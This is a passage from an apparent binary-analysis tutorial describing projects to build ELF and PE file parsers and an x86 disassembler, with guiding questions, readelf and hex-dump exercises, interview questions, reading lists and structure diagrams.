A binary file is just structured data on disk. When executed, the OS loader reads this file and creates a completely different structure in memory. Understanding the distinction is critical.

Guiding questions:

  • Why canโ€™t the OS just load a file directly into memory and jump to it?
  • What transformations must happen between disk and memory?
  • How does the loader know where to place code vs data in memory?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7 (Linking), โ€œPractical Binary Analysisโ€ Ch. 2 (The ELF Format)

2. Virtual Memory and Address Spaces

Every process believes it has the entire address space to itself. The ELF file tells the OS where to map segments in this virtual space.

Guiding questions:

  • Whatโ€™s the difference between a file offset and a virtual address?
  • Why do ELF files specify both p_offset and p_vaddr?
  • How does the loader handle position-independent executables (PIE)?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 9 (Virtual Memory), โ€œLow-Level Programmingโ€ Ch. 4 (Virtual Memory)

3. Linking: Static, Dynamic, and Runtime

Programs rarely stand aloneโ€”they call library functions. ELF contains metadata for three types of linking.

Guiding questions:

  • Whatโ€™s in .symtab vs .dynsym and why do we need both?
  • How does the dynamic linker find printf at runtime?
  • What happens during relocation?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.7-7.10 (Dynamic Linking), โ€œPractical Binary Analysisโ€ Ch. 2.3 (Symbols and Relocations)

4. Sections vs. Segments: A Critical Distinction

Sections are for linking (compile-time), segments are for loading (runtime). This is the most confusing aspect of ELF.

Guiding questions:

  • Can multiple sections map to one segment?
  • Why does readelf show both section headers and program headers?
  • Which is more important for reverse engineering: sections or segments?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 2.2.4 (Sections and Segments), man elf (NOTES section)

5. Byte Order (Endianness)

Binary formats encode multi-byte integers. The byte order matters when reading file structures.

Guiding questions:

  • How do you detect endianness from the ELF header?
  • What happens if you parse a big-endian ELF on a little-endian machine?
  • Which fields in Elf64_Ehdr are multi-byte?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 2.1 (Information Storage), โ€œHacking: The Art of Exploitationโ€ Ch. 2 (Programming)

6. String Tables and Symbol Resolution

Strings in ELF arenโ€™t stored inlineโ€”theyโ€™re in dedicated string table sections referenced by offset.

Guiding questions:

  • Why use offsets into .strtab instead of embedding strings?
  • How do you find the name of a section?
  • Whatโ€™s the relationship between .symtab and .strtab?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 2.3.1 (The Symbol Table), man elf (String Table section)

7. Position-Independent Code (PIC) and ASLR

Modern systems randomize addresses. ELF supports this through relocations and GOT/PLT.

Guiding questions:

  • How can you tell if an ELF is position-independent?
  • Whatโ€™s the difference between ET_EXEC and ET_DYN?
  • Why do some binaries have a base address of 0x400000 and others 0x0?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 5.4 (Position-Independent Code), โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.12 (Position-Independent Code)

Questions to Guide Your Design

  1. How will you handle both 32-bit and 64-bit ELF files? The structures are different (Elf32_Ehdr vs Elf64_Ehdr). Will you use compile-time selection or runtime detection?

  2. Whatโ€™s your error handling strategy? What if the file claims to have 50 section headers but the file is too small? Corrupted binaries are common in malware analysis.

  3. How will you deal with endianness? Will you support parsing big-endian ELF files on little-endian hosts?

  4. Should you use mmap() or read()? Memory-mapping the file vs reading it into a buffer has different implications for large files.

  5. How will you represent and display multi-byte values? Should you show e_machine as 0x3e or EM_X86_64 or AMD x86-64?

  6. What level of validation will you implement? Check magic bytes only, or validate every offset and size field?

  7. How will you handle stripped binaries? What if .symtab is missing but .dynsym exists?

  8. Should your parser be a library or a standalone tool? Consider reusability for future projects.

Thinking Exercise

Before writing any code, perform these manual exercises:

Exercise 1: Hex Dump Analysis

xxd -l 128 /bin/ls

Using only the hex dump and the ELF specification (man elf):

  1. Identify the magic number
  2. Determine if itโ€™s 32-bit or 64-bit
  3. Find the entry point address
  4. Locate the program header table offset
  5. Count the number of program headers

Write down the byte offsets and values. This forces you to understand the exact layout.

Exercise 2: Compare readelf Output

readelf -h /bin/ls
readelf -l /bin/ls
readelf -S /bin/ls

Create a mapping:

  • Which bytes in the hex dump correspond to โ€œEntry point addressโ€?
  • How does readelf calculate the โ€œStart of section headersโ€?
  • Why is โ€œNumber of section headersโ€ sometimes wrong? (Hint: large binaries)

Exercise 3: Trace the String Table Using readelf -x .strtab /bin/ls, manually:

  1. Find a symbol name in .symtab
  2. Extract its st_name offset
  3. Navigate to that offset in .strtab
  4. Verify the null-terminated string

This teaches you how indirection works in binary formats.

Exercise 4: Draw the Memory Map Using readelf -l, draw a diagram showing:

  • Which segments get loaded where in virtual memory
  • How segments overlap or abut
  • Where the .text and .data sections end up
Virtual Memory:
0x0000000000400000  +------------------+
                    | LOAD (R+X)       |  <- .text, .rodata
0x0000000000600000  +------------------+
                    | LOAD (RW)        |  <- .data, .bss
0x0000000000601000  +------------------+

The Interview Questions Theyโ€™ll Ask

  1. โ€œWhatโ€™s the difference between a section and a segment in ELF?โ€
    • Sections are for linking (used by ld), segments are for loading (used by execve). One segment can contain multiple sections.
  2. โ€œHow does the dynamic linker know which libraries to load?โ€
    • The DT_NEEDED entries in the .dynamic section list required libraries. The linker searches paths in DT_RPATH, LD_LIBRARY_PATH, and default system paths.
  3. โ€œCan you explain the GOT and PLT?โ€
    • Global Offset Table (GOT) stores addresses of external symbols. Procedure Linkage Table (PLT) provides lazy bindingโ€”only resolves functions when first called.
  4. โ€œWhat happens when you execute a PIE binary?โ€
    • The kernel chooses a random base address (ASLR), loads all LOAD segments relative to that base, and updates the auxiliary vector with the base address.
  5. โ€œHow do you find the main() function in a stripped binary?โ€
    • Even stripped, _start is the entry point. Disassemble itโ€”it calls __libc_start_main with main as an argument. That argument is the address of main.
  6. โ€œWhatโ€™s the significance of the .interp section?โ€
    • It specifies the path to the dynamic linker (e.g., /lib64/ld-linux-x86-64.so.2). Without it, dynamically linked programs canโ€™t run.
  7. โ€œExplain how relocations work.โ€
    • Relocations are fixups applied by the linker/loader. They adjust addresses based on where code is actually loaded. R_X86_64_RELATIVE adds the base address to a field.
  8. โ€œWhy do some binaries have two symbol tables (.symtab and .dynsym)?โ€
    • .dynsym contains only symbols needed for dynamic linking (kept in release builds). .symtab has all symbols (often stripped from release builds).
  9. โ€œHow can you detect if a binary is packed or encrypted?โ€
    • Look for high entropy in sections (should be code, but looks random), unusual section names, small .text sections with large writable sections, or UPX headers.
  10. โ€œWhatโ€™s the difference between ET_EXEC, ET_DYN, and ET_REL?โ€
    • ET_EXEC: static executable, fixed addresses. ET_DYN: shared object or PIE executable. ET_REL: relocatable object file (.o files).

Books That Will Help

Topic Book Chapter/Section
ELF Format Overview โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 2: The ELF Format
ELF Loading Process โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch. 7.9: Loading Executable Object Files
ELF Headers and Structures โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 12: System Calls, Ch. 13: Models of Computation
Symbol Tables โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.5: Symbols and Symbol Tables
Dynamic Linking โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.7-7.12: Dynamic Linking
Relocations โ€œPractical Binary Analysisโ€ Ch. 2.3.3: Relocations
Virtual Memory โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 9: Virtual Memory
File I/O in C โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch. 2: Programming (File Access section)
Binary Data Structures โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch. 3: Assembly Language, Ch. 4: Virtual Memory
GOT/PLT Internals โ€œPractical Binary Analysisโ€ Ch. 2.3.4: Dynamic Linking
Position-Independent Code โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7.12: Position-Independent Code (PIC)
ASLR and Security โ€œHacking: The Art of Exploitationโ€ Ch. 5: Shellcode (ASLR section)
Stripped Binary Analysis โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 6: Recognizing C Code Constructs
Reference: ELF Specification man elf (Linux manual) All sections

ASCII Diagram: ELF File Structure

+---------------------------+
|      ELF Header           |  <-- Always at offset 0
|  e_ident[16]              |      Contains magic number, class, endianness
|  e_type, e_machine        |      File type and architecture
|  e_entry                  |      Entry point virtual address
|  e_phoff, e_phnum         |  --> Points to Program Header Table
|  e_shoff, e_shnum         |  --> Points to Section Header Table
+---------------------------+
|                           |
|   Program Header Table    |  <-- For loader (runtime)
|   [Elf64_Phdr entries]    |      Describes segments
|   - LOAD (code)           |      e.g., map file offset X to vaddr Y
|   - LOAD (data)           |           with permissions RWX
|   - DYNAMIC               |
|   - INTERP                |
+---------------------------+
|                           |
|   .text section           |  <-- Executable code
|   (machine code bytes)    |
+---------------------------+
|   .rodata section         |  <-- Read-only data (strings)
|   "Hello, world\0"        |
+---------------------------+
|   .data section           |  <-- Initialized writable data
|   global variables        |
+---------------------------+
|   .bss section            |  <-- Uninitialized data (zero-filled)
|   (no bytes on disk!)     |      Only occupies memory at runtime
+---------------------------+
|   .symtab section         |  <-- Symbol table (often stripped)
|   [Elf64_Sym entries]     |      Function/variable names & addresses
+---------------------------+
|   .strtab section         |  <-- String table for .symtab
|   "\0printf\0main\0..."   |      Null-separated strings
+---------------------------+
|   .dynsym section         |  <-- Dynamic symbols (not stripped)
+---------------------------+
|   .dynstr section         |  <-- String table for .dynsym
+---------------------------+
|                           |
|   Section Header Table    |  <-- For linker (link-time)
|   [Elf64_Shdr entries]    |      Describes sections
|   - sh_name, sh_type      |      Name offset, section type
|   - sh_addr, sh_offset    |      Virtual addr, file offset
|   - sh_size, sh_link      |      Size, link to related section
+---------------------------+

Key insight: Program headers (segments) are what matters at runtime. Section headers are metadata for tools like ld and gdb. A stripped binary may have no section headers but still runs fine.


Project 2: PE File Parser

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python, Rust
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Binary Formats / Windows Executables
  • Software or Tool: PE files, Windows or Wine
  • Main Book: โ€œPractical Malware Analysisโ€ by Sikorski & Honig

What youโ€™ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding PE format. Most real-world targets are Windows binaries.

Core challenges youโ€™ll face:

  • DOS header and stub โ†’ maps to legacy compatibility
  • COFF and Optional headers โ†’ maps to PE32 vs PE32+
  • Import Address Table (IAT) โ†’ maps to dynamic linking, API calls
  • Export directory โ†’ maps to DLL functions

Resources for key challenges:

Key Concepts:

  • PE Structure: โ€œPractical Malware Analysisโ€ Ch. 1
  • Import Table: PE Format specification
  • Resources: CFF Explorer documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

$ ./pe_parser suspicious.exe
DOS Header:
  Magic: MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine: x64 (0x8664)
  Sections: 5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic: PE32+ (0x20b)
  Entry Point: 0x1400012a0
  Image Base: 0x140000000

Sections:
  Name     VirtAddr   VirtSize   RawSize    Flags
  .text    0x1000     0x5a00     0x5c00     CODE,EXECUTE,READ
  .rdata   0x7000     0x1e00     0x2000     READ
  .data    0x9000     0x400      0x200      READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc    โ† Suspicious!
  WS2_32.dll:
    - socket          โ† Network activity!
    - connect
    - send
    - recv

Implementation Hints:

The PE format has a layered structure. Parse it step by step:

  1. Read DOS header at offset 0
  2. Follow e_lfanew to find PE signature
  3. Parse COFF header immediately after signature
  4. Parse Optional Header (size varies by PE32 vs PE32+)
  5. Parse section headers after Optional Header
  6. Use Data Directories to find imports, exports, resources

Key questions:

  • What does IMAGE_DIRECTORY_ENTRY_IMPORT point to?
  • How are imported function names resolved (hint: thunks)?
  • Whatโ€™s the difference between RVA and file offset?

Learning milestones:

  1. Parse headers correctly โ†’ Understand PE structure
  2. Extract imports โ†’ See what APIs the program uses
  3. Extract exports โ†’ Understand DLLs
  4. Handle both PE32 and PE32+ โ†’ Support all Windows binaries

The Core Question Youโ€™re Answering

How does Windows organize executable code, manage dynamic linking differently from Unix, and why has this format become the primary target for malware authors worldwide?

The PE format reveals Windowsโ€™ architectural philosophy: backward compatibility at all costs, rich metadata for tools, and a structure that has evolved from MS-DOS through to modern 64-bit Windows. Understanding PE is understanding the Windows ecosystem.

Concepts You Must Understand First

1. The DOS Legacy and Stub Programs

Every PE file begins with an MS-DOS executable. This seems bizarre until you understand Windowsโ€™ commitment to backward compatibility.

Guiding questions:

  • Why does a Windows 11 executable start with โ€œMZโ€ from 1981?
  • What happens if you run a PE file in pure DOS?
  • How does the DOS stub hand off to the real PE code?

Key reading: โ€œPractical Malware Analysisโ€ Ch. 1.2 (Portable Executable File Format), โ€œPractical Binary Analysisโ€ Ch. 2.4 (The PE Format)

2. Relative Virtual Addresses (RVAs) vs. File Offsets

Unlike ELF which uses both, PE heavily relies on RVAs. Almost every pointer in PE is an RVA, not a raw file offset.

Guiding questions:

  • What is an RVA relative to? (Hint: ImageBase)
  • How do you convert an RVA to a file offset?
  • Why does malware often modify ImageBase?

Key reading: โ€œPractical Malware Analysisโ€ Ch. 1.2 (The PE File Structure), Microsoft PE/COFF Specification Section 3 (COFF File Header)

3. Import Address Table (IAT) and Dynamic Linking

Windows programs discover API functions differently than Unix. The IAT is the gateway to understanding what a program can do.

Guiding questions:

  • Whatโ€™s the difference between the Import Name Table and the Import Address Table?
  • How does the Windows loader populate the IAT at load time?
  • Why do malware analysts always check the IAT first?

Key reading: โ€œPractical Malware Analysisโ€ Ch. 1.2.5 (The .idata Section), โ€œPractical Binary Analysisโ€ Ch. 2.4.5 (Import Directory)

4. Sections vs. Segments (Windows Style)

Windows doesnโ€™t call them segmentsโ€”everything is sections. But sections have two alignments: on disk and in memory.

Guiding questions:

  • What is SectionAlignment vs FileAlignment?
  • Why is .text section often larger in memory than on disk?
  • How does section padding affect packing detection?

Key reading: Microsoft PE/COFF Specification Section 4 (Section Table), โ€œPractical Malware Analysisโ€ Ch. 18.1 (Packers and Unpacking)

5. PE32 vs. PE32+ (32-bit vs. 64-bit)

Unlike ELFโ€™s Elf32/Elf64, PE uses the same structures with different Optional Header sizes.

Guiding questions:

  • How do you detect PE32 vs. PE32+? (Hint: Magic field)
  • What fields change between PE32 and PE32+?
  • Can a 64-bit Windows process load 32-bit DLLs?

Key reading: Microsoft PE/COFF Specification Section 3.4 (Optional Header), โ€œPractical Binary Analysisโ€ Ch. 2.4.3 (PE Optional Header)

6. Export Directory and DLL Internals

DLLs are PE files that export functions. Understanding exports is key to understanding how Windows APIs work.

Guiding questions:

  • How are exported functions named vs. numbered (ordinals)?
  • Whatโ€™s the export forwarding chain?
  • Why do some DLLs export thousands of functions?

Key reading: โ€œPractical Malware Analysisโ€ Ch. 1.2.6 (The .edata Section), Microsoft PE/COFF Specification Section 6.3 (Export Directory Table)

7. PE Resources and the .rsrc Section

Unlike ELF, PE files contain a rich resource tree: icons, dialogs, version info, and sometimes malware payloads.

Guiding questions:

  • How is the resource tree structured?
  • What is a resource ID vs. a resource name?
  • Why do analysts check .rsrc for embedded executables?

Key reading: โ€œPractical Malware Analysisโ€ Ch. 1.2.7 (PE File Headers and Sections), Microsoft PE/COFF Specification Section 6.9 (Resource Format)

8. Data Directories and the Optional Header

The PE Optional Header contains 16 data directory entries pointing to critical structures.

Guiding questions:

  • What are the most important data directories for malware analysis?
  • How does IMAGE_DIRECTORY_ENTRY_IMPORT relate to the IAT?
  • What does IMAGE_DIRECTORY_ENTRY_SECURITY contain?

Key reading: โ€œPractical Binary Analysisโ€ Ch. 2.4.4 (Data Directories), Microsoft PE/COFF Specification Section 3.4.4 (Optional Header Data Directories)

Questions to Guide Your Design

  1. How will you handle RVA-to-file-offset conversion? Youโ€™ll need this constantly. Should you pre-build a lookup table from section headers?

  2. Will you parse imports by name or by ordinal? Some DLLs export by ordinal only. Your parser needs to handle both.

  3. How deeply will you parse the resource tree? Resources can be nested multiple levels. Will you recurse fully or just show top-level?

  4. What validation will you perform? PE files from malware are often malformed intentionally to break tools.

  5. How will you display suspicious indicators? Highlight imports like VirtualAlloc, WriteProcessMemory, or unusual section names?

  6. Will you support bound imports? Bound imports pre-cache IAT addresses for performance. Most modern Windows ignores them.

  7. How will you handle exports in executables? EXEs can export functions (rare but legal). Will you check for this?

  8. Should you calculate entropy per section? High entropy suggests packing or encryptionโ€”a key malware indicator.

Thinking Exercise

Before writing code, perform these manual exercises:

Exercise 1: Manual PE Parsing

xxd -l 512 /path/to/some.exe  # or use a Windows PE file

Using a hex editor and the PE specification:

  1. Find the โ€œMZโ€ signature at offset 0
  2. Navigate to offset 0x3C and read the 4-byte value (e_lfanew)
  3. Jump to that offset and verify โ€œPE\0\0โ€ signature
  4. Parse the COFF header: Machine type, Number of sections, Timestamp
  5. Calculate where the Section Table begins

Write down each calculation. This cements the layered structure.

Exercise 2: Trace an Import Using a tool like CFF Explorer or pefile (Python):

import pefile
pe = pefile.PE('suspicious.exe')
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    print(entry.dll.decode())
    for imp in entry.imports:
        print(f'  {imp.name.decode() if imp.name else f"Ordinal {imp.ordinal}"}')

Pick one import (e.g., CreateFileA from KERNEL32.dll):

  1. Find its entry in the Import Directory
  2. Locate the Import Name Table entry
  3. Find the corresponding Import Address Table entry
  4. Understand how the loader will patch this at runtime

Exercise 3: Section Alignment Analysis For a sample PE file:

  1. Note FileAlignment and SectionAlignment from Optional Header
  2. For each section, calculate:
    • VirtualAddress (where it loads in memory)
    • VirtualSize (size in memory)
    • PointerToRawData (offset in file)
    • SizeOfRawData (size in file)
  3. Identify any discrepanciesโ€”common in packed malware

Exercise 4: Resource Tree Exploration

# On Linux, use wrestool from icoutils
wrestool -x --output=. sample.exe
# Lists and extracts all resources

Explore the .rsrc section:

  1. How many resource types exist? (RT_ICON, RT_DIALOG, etc.)
  2. Are there any unusual resource names?
  3. Check for embedded PEs or suspicious binary blobs

Draw the resource tree structure manually.

The Interview Questions Theyโ€™ll Ask

  1. โ€œWhatโ€™s the difference between the DOS header and the PE header?โ€
    • The DOS header (MZ header) is at offset 0 for DOS compatibility. Its e_lfanew field points to the real PE header (PE\0\0 signature). The PE header contains the COFF header and Optional Header.
  2. โ€œHow do you convert an RVA to a file offset?โ€
    • Find which section contains the RVA by checking section VirtualAddress ranges. Then: FileOffset = RVA - SectionVirtualAddress + SectionPointerToRawData.
  3. โ€œExplain how the Windows loader populates the IAT.โ€
    • The loader reads each DLL from the Import Directory, calls LoadLibrary to load the DLL, uses GetProcAddress to resolve each imported function, and writes the actual addresses into the Import Address Table.
  4. โ€œWhat are some red flags in a PE file that suggest malware?โ€
    • Unusual section names (.aspack, .upx), high entropy sections, mismatched timestamps, imports of process injection APIs (CreateRemoteThread, VirtualAllocEx), tiny .text section with huge .data, resources larger than code sections.
  5. โ€œWhatโ€™s the difference between IMAGE_FILE_EXECUTABLE_IMAGE and IMAGE_FILE_DLL?โ€
    • Both are flags in the COFF Characteristics field. IMAGE_FILE_EXECUTABLE_IMAGE means itโ€™s a valid executable. IMAGE_FILE_DLL means itโ€™s a DLL (cannot be run directly, must be loaded by another process).
  6. โ€œHow does ASLR work in Windows PE files?โ€
    • If DllCharacteristics includes IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, the OS can relocate the image to a random base address. The .reloc section contains fixup information for this.
  7. โ€œWhat is ordinal importing and why is it used?โ€
    • Instead of importing by name (โ€œCreateFileAโ€), you import by number (ordinal 1234). Itโ€™s smaller and slightly faster but breaks if DLL versions change. Often used in system DLLs.
  8. โ€œWhatโ€™s in the .reloc section?โ€
    • Base relocation entries. If the PE canโ€™t load at its preferred ImageBase, the loader uses these entries to fix up all absolute addresses. Required for DLLs and ASLR-enabled EXEs.
  9. โ€œHow can you tell if a PE is packed?โ€
    • Check section names (UPX, ASPack, etc.), compare SizeOfImage to raw file size, calculate entropy (packed sections have high entropy ~7.5-8.0), look for abnormal entry point (EP in last section or writable section).
  10. โ€œWhatโ€™s the significance of the TLS (Thread Local Storage) directory?โ€
    • TLS callbacks execute before the main entry pointโ€”earlier than AddressOfEntryPoint. Malware uses TLS callbacks for anti-debugging and to run code before analysts expect.

Books That Will Help

Topic Book Chapter/Section
PE Format Overview โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch. 1: Basic Static Techniques (PE File Format)
PE File Structure โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch. 2.4: The PE Format - A Comparison with ELF
Import/Export Tables โ€œPractical Malware Analysisโ€ Ch. 1.2.5-1.2.6: Imports and Exports
PE Headers Deep Dive โ€œPractical Binary Analysisโ€ Ch. 2.4.3-2.4.5: PE Headers and Data Directories
Dynamic Linking on Windows โ€œPractical Malware Analysisโ€ Ch. 7: Analyzing Malicious Windows Programs
Resource Sections โ€œPractical Malware Analysisโ€ Ch. 1.2.7: PE Sections (Resources)
Packers and Obfuscation โ€œPractical Malware Analysisโ€ Ch. 18: Packers and Unpacking
RVA and Address Calculations Microsoft PE/COFF Specification Section 4: Section Table (online)
Windows Internals (Loading) โ€œWindows Internalsโ€ by Russinovich et al. Part 1, Ch. 3: System Mechanisms (Image Loader)
Malware Analysis Techniques โ€œPractical Malware Analysisโ€ Ch. 3: Basic Dynamic Analysis
File Format Reversing โ€œHacking: The Art of Exploitationโ€ by Erickson Ch. 4: Exploitation (Binary Formats section)
Section Characteristics Microsoft PE/COFF Specification Section 4.1: Section Flags (online)
TLS Callbacks โ€œPractical Malware Analysisโ€ Ch. 14: Malware-Focused Network Signatures (TLS section)
Reference: PE/COFF Spec Microsoft PE/COFF Specification All sections (online documentation)

ASCII Diagram: PE File Structure

+--------------------------------+
|        DOS Header (MZ)         |  <-- Offset 0x00
|  e_magic = "MZ" (0x5A4D)       |      DOS compatibility stub
|  ...                           |
|  e_lfanew = 0x000000E0         |  --> Points to PE Header
+--------------------------------+
|                                |
|        DOS Stub Program        |      "This program cannot be run in DOS mode"
|  (can be modified/enlarged)    |
+--------------------------------+
|                                |
|   PE Signature (PE\0\0)        |  <-- Offset e_lfanew (e.g., 0xE0)
|   0x00004550                   |
+--------------------------------+
|        COFF Header             |
|  Machine (0x8664 = x64)        |
|  NumberOfSections              |
|  TimeDateStamp                 |
|  SizeOfOptionalHeader          |
|  Characteristics               |
+--------------------------------+
|      Optional Header           |
|  Magic (0x10B=PE32/0x20B=PE32+)|
|  AddressOfEntryPoint           |  --> Where execution begins (RVA)
|  ImageBase                     |      Preferred load address
|  SectionAlignment              |      Alignment in memory (usually 0x1000)
|  FileAlignment                 |      Alignment on disk (usually 0x200)
|  SizeOfImage                   |      Total size when loaded
|  SizeOfHeaders                 |
|  Subsystem (GUI/Console)       |
|  DllCharacteristics            |      ASLR, DEP flags, etc.
|  NumberOfRvaAndSizes           |      Usually 16
|                                |
|    Data Directories [16]       |
|    [0] Export Table            |
|    [1] Import Table            |  --> Critical for analysis
|    [2] Resource Table          |
|    [3] Exception Table         |
|    [5] Base Relocation         |
|    [9] TLS Table               |      TLS callbacks
|    [12] IAT                    |      Import Address Table
|    [14] COM Descriptor         |      .NET assemblies
+--------------------------------+
|                                |
|      Section Table             |      NumberOfSections entries
|   [Section Header for .text]  |
|     Name = ".text"             |
|     VirtualSize                |
|     VirtualAddress (RVA)       |      Where it loads in memory
|     SizeOfRawData              |
|     PointerToRawData           |      Offset in file
|     Characteristics (RX)       |      Readable + Executable
|                                |
|   [Section Header for .rdata] |
|   [Section Header for .data]  |
|   [Section Header for .rsrc]  |
|   [Section Header for .reloc] |
+--------------------------------+
|                                |
|     .text Section              |  <-- Executable code
|   (machine code bytes)         |
|                                |
+--------------------------------+
|     .rdata Section             |  <-- Read-only data
|   Import Directory             |      Import Name Table (INT)
|   Import Address Table (IAT)   |      Function pointers (patched by loader)
|   String literals              |
+--------------------------------+
|     .data Section              |  <-- Initialized writable data
|   Global variables             |
+--------------------------------+
|     .rsrc Section              |  <-- Resources (icons, strings, dialogs)
|   Resource Directory Tree      |
|   Icons, Version Info          |
+--------------------------------+
|     .reloc Section             |  <-- Base relocations for ASLR
|   Relocation blocks            |
+--------------------------------+

Key Insight: The Import Address Table (IAT) is one of the first things to analyze. It reveals every API function the program can callโ€”a behavioral fingerprint. In malware, suspicious imports like VirtualAlloc + WriteProcessMemory + CreateRemoteThread indicate process injection.

Project 3: Build a Simple Disassembler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Python (with Capstone), Rust
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Disassembly / x86 Instruction Encoding
  • Software or Tool: Intel manuals, Capstone engine
  • Main Book: โ€œIntel 64 and IA-32 Architectures Software Developerโ€™s Manualโ€

What youโ€™ll build: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

Why it teaches binary analysis: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

Core challenges youโ€™ll face:

  • Variable-length instructions โ†’ maps to x86 has 1-15 byte instructions
  • Prefixes and REX bytes โ†’ maps to operand size, 64-bit registers
  • ModR/M and SIB bytes โ†’ maps to addressing modes
  • Immediate and displacement โ†’ maps to constants and offsets

Resources for key challenges:

Key Concepts:

  • x86 Instruction Format: Intel SDM Volume 2, Chapter 2
  • ModR/M Encoding: X86 Opcode Reference
  • Linear vs Recursive Descent: โ€œPractical Binary Analysisโ€ Ch. 6

Difficulty: Advanced Time estimate: 2-4 weeks Prerequisites: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

$ ./disasm program.bin
00000000: 55                    push rbp
00000001: 48 89 e5              mov rbp, rsp
00000004: 48 83 ec 40           sub rsp, 0x40
00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
0000000c: 48 89 c7              mov rdi, rax
0000000f: e8 xx xx xx xx        call 0x????????
00000014: 31 c0                 xor eax, eax
00000016: c9                    leave
00000017: c3                    ret

Implementation Hints:

x86 instruction format:

[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8

Start simple:

  1. Handle single-byte opcodes first (push, pop, ret, nop)
  2. Add instructions with ModR/M byte (mov, add, sub)
  3. Add REX prefix support for 64-bit
  4. Add SIB byte for complex addressing
  5. Handle prefixes (operand size, segment override)

Questions to consider:

  • How do you distinguish mov eax, ebx from mov eax, [ebx]?
  • What does the REX.W prefix do?
  • How do you handle instructions with the same opcode but different meanings?

Learning milestones:

  1. Disassemble basic instructions โ†’ Single-byte opcodes work
  2. Handle ModR/M byte โ†’ Register and memory operands
  3. Support 64-bit mode โ†’ REX prefix parsing
  4. Handle all addressing modes โ†’ SIB byte, displacements

The Core Question Youโ€™re Answering

How does a CPU decode variable-length instruction streams into executable operations, and why is x86 considered one of the most complex instruction sets to disassemble?

Disassembly is reverse compilation at the lowest level. Youโ€™re recreating human-readable assembly from the raw bytes the CPU executes. Unlike fixed-width RISC architectures, x86/x64 instructions range from 1 to 15 bytes, making this problem fundamentally about pattern recognition and context.

Concepts You Must Understand First

1. Instruction Encoding and Variable-Length Instructions

x86 is a CISC architectureโ€”Complex Instruction Set Computer. One instruction might be 1 byte (ret), another 15 bytes (a complex movaps with all prefixes).

Guiding questions:

  • Why doesnโ€™t x86 use fixed-width instructions like ARM or MIPS?
  • How does the CPU know where one instruction ends and the next begins?
  • What happens if you try to disassemble from the wrong offset (misaligned)?

Key reading: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.5 (Instruction Encoding), Intel SDM Volume 2A Ch. 2 (Instruction Format)

2. Opcode Tables and Instruction Prefixes

The first byte (or bytes) of an instruction determine what it does. But prefixes can modify almost everything.

Guiding questions:

  • Whatโ€™s the difference between a one-byte opcode and a two-byte opcode (0x0F escape)?
  • How many prefix bytes can one instruction have?
  • What does the LOCK prefix do?

Key reading: Intel 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 2, โ€œLow-Level Programmingโ€ Ch. 3.5 (x86-64 Assembly Language)

3. ModR/M and SIB Bytes: Operand Encoding

After the opcode comes ModR/M (Mod-Reg-R/M), which encodes register and memory operands. Sometimes a SIB (Scale-Index-Base) byte follows.

Guiding questions:

  • How does ModR/M encode mov eax, ebx vs mov eax, [ebx]?
  • When do you need a SIB byte?
  • What do the Mod field values (00, 01, 10, 11) mean?

Key reading: Intel SDM Volume 2A Section 2.1.5 (ModR/M and SIB Bytes), โ€œPractical Binary Analysisโ€ Ch. 6.2.2 (Linear Disassembly)

4. Displacement and Immediate Values

Many instructions have trailing bytes for offsets (displacements) or constants (immediates).

Guiding questions:

  • How do you know if an instruction has a displacement?
  • Whatโ€™s the difference between an 8-bit and 32-bit immediate?
  • How are signed immediates handled?

Key reading: Intel SDM Volume 2A Section 2.2 (Immediates and Displacements)

5. REX Prefix and 64-bit Mode

x86-64 added REX prefixes to access 64-bit registers (RAX, RBX, etc.) and extended registers (R8-R15).

Guiding questions:

  • How does the REX.W bit change instruction behavior?
  • What do REX.R, REX.X, REX.B extend?
  • Can you have multiple REX prefixes? (No!)

